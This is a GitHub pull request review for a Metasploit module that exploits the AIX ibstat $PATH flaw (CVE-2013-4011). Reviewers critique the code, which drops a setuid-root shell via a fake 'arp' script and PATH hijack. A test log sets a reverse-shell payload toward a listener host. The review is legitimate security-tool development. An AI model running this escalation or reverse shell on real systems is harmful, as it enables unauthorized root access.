Skip to content

Add AIX 6.1/7.1 ibstat $PATH Local Priv-Esc #3046

Merged
merged 8 commits into from Apr 3, 2014

3 participants

@wvu-r7 wvu-r7 self-assigned this Feb 27, 2014
@wvu-r7
wvu-r7 commented Feb 27, 2014

AIX! w00t!

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ 'AIX' => '7.1',
+ }
+ ],
+
+ ],
+ 'DefaultTarget' => 1,
+ }
+ ))
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
+ ], self.class)
+ end
+
+ def exploit
+
+ if not is_vuln()
@Meatballs1
Meatballs1 added a note Feb 27, 2014

fail_with(Failure::NotVulnerable, "Target is not vulnerable.") unless is_vuln

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec "chmod 0555 " + arp_file
+ end
+
+ def verify_root(filename)
+ cmd_exec filename
+ id_output = cmd_exec "id"
+ if id_output.include? ("euid=0(root)")
+ print_good("Got root! (euid)")
+ elsif id_output.include?("uid=0(root)")
+ print_good("Got root!")
+ else
+ print_status("Exploit failed")
+ end
+ end
+
+ def is_vuln()
@Meatballs1
Meatballs1 added a note Feb 27, 2014

def is_vuln - without braces is Ruby style if no args

@Meatballs1
Meatballs1 added a note Feb 27, 2014

This should probably be implemented as the check method. See https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'ibstat $PATH Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
+ },
+ 'Author' =>
+ [
+ 'Kristian Erik Hermansen', #original author
+ 'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', #msf module
@Meatballs1
Meatballs1 added a note Feb 27, 2014

Move (sagi-) to comment please

@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ ))
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
+ ], self.class)
+ end
+
+ def exploit
+
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
@Meatballs1
Meatballs1 added a note Feb 27, 2014

if is_gcc_installed

n.b. Ruby style would have method name gcc_installed?

@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Why use GCC at all?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
@Meatballs1
Meatballs1 added a note Feb 27, 2014

include Msf::Post::File

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ def exploit
+
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
@Meatballs1
Meatballs1 added a note Feb 27, 2014

file_rm

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Also, use parens for the call.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Note that file_rm uses rm -f.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
+ end
+ print_status("Writing custom arp file...")
+ write_arp_file("#{arp_file}","#{root_file}")
+ print_status("Custom arp file written")
+ print_status("Updating PATH environment variable...")
+ cmd_exec 'PATH=.:$PATH'
+ cmd_exec 'export PATH'
+ print_status("Triggering vulnerablity...")
+ cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+ print_status("Removing custom arp...")
+ cmd_exec "rm #{arp_file}"
@Meatballs1
Meatballs1 added a note Feb 27, 2014

file_rm

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec 'export PATH'
+ print_status("Triggering vulnerablity...")
+ cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+ print_status("Removing custom arp...")
+ cmd_exec "rm #{arp_file}"
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
+ end
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
@Meatballs1
Meatballs1 added a note Feb 27, 2014

print_good("gcc found! (#{res})")

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
+ end
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
@Meatballs1
Meatballs1 added a note Feb 27, 2014

It's a ruby style to not put return on the last item so this line would just be:

false

Also no ;

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
@Meatballs1
Meatballs1 added a note Feb 27, 2014

This could probably just use the write_file method. See https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/file.rb

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Yes, use write_file.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
+ cmd_exec "echo \"return 0;\" >> " + c_file
+ cmd_exec "echo \"}\" >> " + c_file
+ end
+
+ def write_arp_file(arp_file, bin_file)
+ cmd_exec "echo \"#!/bin/sh\" > " + arp_file
@Meatballs1
Meatballs1 added a note Feb 27, 2014

As above

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7
wvu-r7 commented Feb 27, 2014

Well, looks like @Meatballs1 is reviewing this, too. :P

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ ], self.class)
+ end
+
+ def exploit
+
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
@Meatballs1
Meatballs1 added a note Feb 27, 2014

cmd_exec "gcc -o #{root_file} #{root_file}.c"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Unnecessary.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
@wvu-r7
wvu-r7 added a note Feb 27, 2014
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Brace unnecessary.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
@Meatballs1
Meatballs1 added a note Feb 27, 2014

cmd_exec "cp /bin/sh #{root_file}"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ 'AIX' => '6.1',
+ }
+ ],
+
+ [
+ 'IBM AIX Version 7.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '7.1',
+ }
+ ],
+
+ ],
+ 'DefaultTarget' => 1,
+ }
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Brace unnecessary.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+ [
+ 'IBM AIX Version 7.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '7.1',
+ }
+ ],
+
+ ],
+ 'DefaultTarget' => 1,
+ }
+ ))
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Why .? /tmp is probably better.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ 'Platform' => 'aix',
+ 'AIX' => '6.1',
+ }
+ ],
+
+ [
+ 'IBM AIX Version 7.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '7.1',
+ }
+ ],
+
+ ],
+ 'DefaultTarget' => 1,
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Missing DisclosureDate.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'ibstat $PATH Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
+ },
+ 'Author' =>
+ [
+ 'Kristian Erik Hermansen', #original author
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'ibstat $PATH Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
+ },
+ 'Author' =>
+ [
+ 'Kristian Erik Hermansen', #original author
+ 'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', #msf module
+ 'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
+ cmd_exec "echo \"return 0;\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
+ return false;
+ end
+
+ def write_c_file(filename)
+ c_file = filename + ".c"
+ print_status("Dropping file " + c_file + "...")
+ cmd_exec "echo \"#include <stdio.h>\n\" > " + c_file
+ cmd_exec "echo \"int main()\" >> " + c_file
+ cmd_exec "echo \"{\" >> " + c_file
+ cmd_exec "echo \"setreuid(0,0);\" >> " + c_file
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
+ cmd_exec "echo \"return 0;\" >> " + c_file
+ cmd_exec "echo \"}\" >> " + c_file
@wvu-r7
wvu-r7 added a note Feb 27, 2014

EOL whitespace.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => 'ibstat $PATH Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
@wvu-r7
wvu-r7 added a note Feb 27, 2014

$PATH like above.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
+ end
+ print_status("Writing custom arp file...")
+ write_arp_file("#{arp_file}","#{root_file}")
+ print_status("Custom arp file written")
+ print_status("Updating PATH environment variable...")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

$PATH for consistency.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ register_options([
+ OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
+ ], self.class)
+ end
+
+ def exploit
+
+ if not is_vuln()
+ return
+ end
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Don't interpolate.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
+ end
+ print_status("Writing custom arp file...")
+ write_arp_file("#{arp_file}","#{root_file}")
+ print_status("Custom arp file written")
+ print_status("Updating PATH environment variable...")
+ cmd_exec 'PATH=.:$PATH'
+ cmd_exec 'export PATH'
+ print_status("Triggering vulnerablity...")
+ cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+ print_status("Removing custom arp...")
+ cmd_exec "rm #{arp_file}"
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Don't interpolate.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+
+ root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
+ arp_file = "#{datastore["WritableDir"]}/arp"
+
+ if (is_gcc_installed == true)
+ write_c_file("#{root_file}")
+ print_status("Compiling source...")
+ cmd_exec "gcc -o #{root_file} #{root_file}" + ".c"
+ print_status("Compilation completed")
+ print_status("Deleting source...")
+ cmd_exec "rm #{root_file}.c"
+ else
+ cmd_exec "cp /bin/sh " + "#{root_file}"
+ end
+ print_status("Writing custom arp file...")
+ write_arp_file("#{arp_file}","#{root_file}")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Don't interpolate.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1

Fundamentally this exploit doesn't drop a Metasploit payload and just elevates the current session. Metasploit exploits have to deliver a payload so will either have to drop an ARCH_CMD shell or drop an AIX binary!

@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec "rm #{arp_file}"
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
+ end
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
+ print_good("gcc found! " + "(" + "#{res}" + ")")
+ return true
+ end
+ end
+ print_status("gcc not found. Using /bin/sh from local system")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

See comment above about using GCC.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 and 1 other commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec "echo \"setregid(0,0);\" >> " + c_file
+ cmd_exec "echo \"execve(\\\"/bin/sh\\\",NULL,NULL);\" >> " + c_file
+ cmd_exec "echo \"return 0;\" >> " + c_file
+ cmd_exec "echo \"}\" >> " + c_file
+ end
+
+ def write_arp_file(arp_file, bin_file)
+ cmd_exec "echo \"#!/bin/sh\" > " + arp_file
+ cmd_exec "echo \"chown root " + bin_file + "\" >> " + arp_file
+ cmd_exec "echo \"chmod 4555 " + bin_file + "\" >> " + arp_file
+ cmd_exec "chmod 0555 " + arp_file
+ end
+
+ def verify_root(filename)
+ cmd_exec filename
+ id_output = cmd_exec "id"
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Why id? whoami is probably better.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Oh, yeah, there's id -u, too. Forgot about that. Thanks, @Meatballs1.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Or id -un if you want output identical to whoami.

@Meatballs1
Meatballs1 added a note Feb 27, 2014

Post::Linux::Priv implements is_root? which would probably work instead of this method. Maybe it should be renamed as Nix::Priv though @jlee-r7 ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
@@ -0,0 +1,150 @@
+# Not sure if the deps are correct
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Two-space soft tabs.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ end
+
+ def verify_root(filename)
+ cmd_exec filename
+ id_output = cmd_exec "id"
+ if id_output.include? ("euid=0(root)")
+ print_good("Got root! (euid)")
+ elsif id_output.include?("uid=0(root)")
+ print_good("Got root!")
+ else
+ print_status("Exploit failed")
+ end
+ end
+
+ def is_vuln()
+ ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Why ls? test is probably better.

@wvu-r7
wvu-r7 added a note Feb 27, 2014

Or you can use find as suggested by @kernelsmith.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ print_status("Exploit failed")
+ end
+ end
+
+ def is_vuln()
+ ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
+ if ls_output.include? ("-r-sr-xr-x")
+ print_good("Target is vulnerable")
+ return true
+ else
+ print_status("Target is not vulnerable")
+ return false
+ end
+ end
+end
+
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Extraneous newline.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7 wvu-r7 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ cmd_exec 'PATH=.:$PATH'
+ cmd_exec 'export PATH'
+ print_status("Triggering vulnerablity...")
+ cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
+ print_status("Removing custom arp...")
+ cmd_exec "rm #{arp_file}"
+ print_status("Checking root privileges...")
+ verify_root("#{root_file}")
+ end
+
+ def is_gcc_installed
+ print_status("Checking if gcc exists...")
+ gcc_version = cmd_exec 'gcc -v'
+ gcc_array = gcc_version.split("\n")
+ gcc_array.each do |res|
+ if res.include? ("gcc version")
@wvu-r7
wvu-r7 added a note Feb 27, 2014

Extraneous space.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@Meatballs1

To help tidy up the whitespace use ruby tools/msftidy.rb modules/exploits/aix/local/ibstat_path.rb until you get no warnings back

@Meatballs1 Meatballs1 commented on an outdated diff Feb 27, 2014
modules/exploits/aix/local/ibstat_path.rb
+ 'References' =>
+ [
+ [ 'CVE', '2013-4011' ],
+ [ 'OSVDB', '95420' ],
+ [ 'BID', '61287' ],
+ [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
+ [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
+ ],
+ 'Platform' => [ 'aix' ],
+ 'Arch' => [ 'ppc' ],
+ 'Targets' =>
+ [
+ [
+ 'IBM AIX Version 6.1',
+ {
+ 'Arch' => 'ppc',
@Meatballs1
Meatballs1 added a note Feb 27, 2014

I dont think you need to repeat the Arch and Platform in each target?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7
wvu-r7 commented Feb 27, 2014

Travis isn't marking this as a failed build when it should. We'll have to sort that out.

@wvu-r7 wvu-r7 commented on an outdated diff Feb 28, 2014
modules/exploits/aix/local/ibstat_path.rb
+ [
+ [
+ 'IBM AIX Version 6.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '6.1',
+ }
+ ],
+
+ [
+ 'IBM AIX Version 7.1',
+ {
+ 'Arch' => 'ppc',
+ 'Platform' => 'aix',
+ 'AIX' => '7.1',
@wvu-r7
wvu-r7 added a note Feb 28, 2014

Extraneous comma.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@wvu-r7
wvu-r7 commented Mar 20, 2014

The AIX box we have is AIX 4. I don't think we can test this immediately.

@sagishahar

No worries, I will try to get you access to an AIX box. If possible, give me a few days please.

@wvu-r7
wvu-r7 commented Mar 27, 2014

Works for me:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS [redacted]
RHOSTS => [redacted]
msf auxiliary(ssh_login) > set USERNAME [redacted]
USERNAME => [redacted]
msf auxiliary(ssh_login) > set PASSWORD [redacted]
PASSWORD => [redacted]
msf auxiliary(ssh_login) > run

[*] [redacted]:22 SSH - Starting bruteforce
[*] [redacted]:22 SSH - [1/1] - Trying: username: '[redacted]' with password: '[redacted]'
[*] Command shell session 1 opened ([redacted]:47387 -> [redacted]:22) at 2014-03-27 16:15:40 -0500
[+] [redacted]:22 SSH - [1/1] - Success: '[redacted]':'[redacted]' 'uid=20013521([redacted]) gid=1(staff) AIX l273pp056_pub 1 7 00F602734C00 '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use exploit/aix/local/ibstat_path
msf exploit(ibstat_path) > set SESSION 1
SESSION => 1
msf exploit(ibstat_path) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf exploit(ibstat_path) > set LHOST [redacted]
